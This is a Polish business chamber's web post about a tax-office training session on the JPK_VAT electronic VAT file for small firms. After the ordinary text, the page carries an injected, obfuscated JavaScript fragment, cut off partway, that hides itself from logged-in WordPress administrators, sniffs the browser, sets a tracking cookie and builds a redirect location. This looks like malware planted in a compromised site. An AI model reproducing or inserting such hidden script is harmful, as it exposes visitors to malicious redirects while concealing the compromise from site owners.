Informacja po spotkaniu – Jednolity Plik Kontrolny dla mikroprzedsiębiorstw | Północna Izba Gospodarcza w Koszalinie

Szanowni Państwo!

28 listopada br. w Pierwszym Urzędzie Skarbowym w Koszalinie odbyło się bezpłatne szkolenie dla przedsiębiorców z Jednolitego Pliku Kontrolnego.

Temat jest niezwykle aktualny i istotny, ponieważ od 1 stycznia 2018 roku, wszyscy podatnicy VAT mają obowiązek ewidencji zakupów i sprzedaży poprzez Jednolity Plik Kontrolny JPK_VAT. Dzisiejsze szkolenie było ostatnim z serii przygotowanych przez Ministerstwo Finansów i Urzędy Skarbowe.

Więcej informacji na temat JPK pod linkiem:

» czytaj więcej

Bardzo dziękujemy za Państwa udział w Jesieni Szkoleń! W tym okresie przybliżyliśmy ważne tematy zmian przepisów w prawie ponad setce naszych członków i niezrzeszonych przedsiębiorców. Już po feriach wracamy z zimową serią szkoleń. Zachęcamy również do składania propozycji tematów.

  'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m